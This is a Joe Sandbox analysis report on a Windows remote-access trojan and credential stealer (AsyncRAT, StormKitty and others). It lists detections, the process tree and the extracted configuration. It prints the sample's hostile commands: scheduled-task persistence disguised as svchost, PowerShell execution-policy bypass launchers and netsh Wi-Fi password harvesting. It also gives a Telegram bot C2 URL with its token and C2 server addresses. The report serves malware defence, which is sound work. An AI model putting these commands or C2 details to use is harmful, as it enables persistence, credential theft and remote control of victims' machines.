Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zrrHgsDzgS.exe

Overview

General Information

Sample name:zrrHgsDzgS.exe
renamed because original name is a hash value
Original sample name:6d13d147a209e3be044035f0c03b7bde.exe
Analysis ID:1464066
MD5:6d13d147a209e3be044035f0c03b7bde
SHA1:1eb5fb487ea7742ff1766ca5bf1b7191cfcf6283
SHA256:9c457b1cd061ae951fbed7841149b247e085befa6e2c5170058ce35cdebce548
Tags:32exe
Infos:

Detection

AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Schedule system process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected PureLog Stealer
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • zrrHgsDzgS.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\zrrHgsDzgS.exe" MD5: 6D13D147A209E3BE044035F0C03B7BDE)
    • cmd.exe (PID: 6736 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6940 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 6788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7040 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • svchost.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D13D147A209E3BE044035F0C03B7BDE)
  • svchost.exe (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D13D147A209E3BE044035F0C03B7BDE)
    • cmd.exe (PID: 6952 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 824 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • udwnme.exe (PID: 4884 cmdline: "C:\Users\user\AppData\Local\Temp\udwnme.exe" MD5: DA34EA26DDFEDFD7966E8AEDF0BB93E6)
          • cmd.exe (PID: 5340 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2368 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 6904 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 6496 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3312 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3940 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 8 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6852 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • luglzv.exe (PID: 5052 cmdline: "C:\Users\user\AppData\Local\Temp\luglzv.exe" MD5: FF895D93516828450E0C0DD0E467E1D0)
          • cmd.exe (PID: 5064 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1904 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 4624 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 480 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 2144 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1168 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 772 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage"}

Threatname: AsyncRAT

{"External_config_on_Pastebin": "null", "Server": "127.0.0.1,94.232.249.111", "Ports": "6606,7707,8808", "Version": "0.5.8", "Autorun": "true", "Install_Folder": "svchost.exe", "Install_File": "SHNUTU5pdURCTEJXcktBMGkwVVVmZzdxdHJGYmVUd3I="}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zrrHgsDzgS.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    zrrHgsDzgS.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      zrrHgsDzgS.exeWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0xb638:$a2: Stub.exe
      • 0xb6c8:$a2: Stub.exe
      • 0x6f81:$a3: get_ActivatePong
      • 0xa4a7:$a4: vmware
      • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x7cd2:$a6: get_SslClient
      zrrHgsDzgS.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
      • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x31d1f:$x1: AsyncRAT
      • 0x31d5d:$x1: AsyncRAT

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          C:\Users\user\AppData\Roaming\svchost.exeWindows_Trojan_Asyncrat_11a11ba1unknownunknown
          • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
          • 0xb638:$a2: Stub.exe
          • 0xb6c8:$a2: Stub.exe
          • 0x6f81:$a3: get_ActivatePong
          • 0xa4a7:$a4: vmware
          • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
          • 0x7cd2:$a6: get_SslClient
          C:\Users\user\AppData\Roaming\svchost.exeINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          C:\Users\user\AppData\Local\Temp\udwnme.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
            Click to see the 21 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e0b:$x1: AsyncRAT
            • 0x4e49:$x1: AsyncRAT
            00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x29feb:$x1: AsyncRAT
            • 0x2a029:$x1: AsyncRAT
            00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0xb15b:$x1: AsyncRAT
            • 0xb199:$x1: AsyncRAT
            0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
              • 0x5fd0:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
              Click to see the 66 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              7.2.svchost.exe.7450000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.0.zrrHgsDzgS.exe.660000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  0.0.zrrHgsDzgS.exe.660000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.0.zrrHgsDzgS.exe.660000.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                    • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                    • 0xb638:$a2: Stub.exe
                    • 0xb6c8:$a2: Stub.exe
                    • 0x6f81:$a3: get_ActivatePong
                    • 0xa4a7:$a4: vmware
                    • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                    • 0x7cd2:$a6: get_SslClient
                    0.0.zrrHgsDzgS.exe.660000.0.unpackINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
                    • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
                    Click to see the 56 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\zrrHgsDzgS.exe, ProcessId: 6452, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe
                    Sigma detected: Invoke-Obfuscation VAR+ Launcher
                    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe
                    Sigma detected: Suspect Svchost Activity
                    Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , ProcessId: 824, ProcessName: powershell.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6736, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 6940, ProcessName: schtasks.exe
                    Sigma detected: Suspicious desktop.ini Action
                    Source: File createdAuthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\udwnme.exe, ProcessId: 4884, TargetFilename: C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6788, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3620, ProcessName: svchost.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , ProcessId: 824, ProcessName: powershell.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Schedule system process
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Capture Wi-Fi password
                    Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\udwnme.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\udwnme.exe, ParentProcessId: 4884, ParentProcessName: udwnme.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5340, ProcessName: cmd.exe

                    Snort Signatures

                    Timestamp:06/28/24-11:19:22.223998
                    SID:2030673
                    Source Port:7707
                    Destination Port:49739
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/28/24-11:19:22.223998
                    SID:2035595
                    Source Port:7707
                    Destination Port:49739
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: zrrHgsDzgS.exeAvira: detected
                    Found malware configuration
                    Source: zrrHgsDzgS.exeMalware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "127.0.0.1,94.232.249.111", "Ports": "6606,7707,8808", "Version": "0.5.8", "Autorun": "true", "Install_Folder": "svchost.exe", "Install_File": "SHNUTU5pdURCTEJXcktBMGkwVVVmZzdxdHJGYmVUd3I="}
                    Source: udwnme.exe.4884.15.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage"}
                    Multi AV Scanner detection for domain / URL
                    Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13Virustotal: Detection: 8%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 86%
                    Multi AV Scanner detection for submitted file
                    Source: zrrHgsDzgS.exeReversingLabs: Detection: 86%
                    Source: zrrHgsDzgS.exeVirustotal: Detection: 82%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: zrrHgsDzgS.exeJoe Sandbox ML: detected
                    Source: zrrHgsDzgS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64790 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64791 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64796 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64797 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:64801 version: TLS 1.2
                    Source: zrrHgsDzgS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: winload_prod.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: winload_prod.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr
                    Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.15.dr, Temp.txt.28.dr

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 94.232.249.111:7707 -> 192.168.2.4:49739
                    Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 94.232.249.111:7707 -> 192.168.2.4:49739
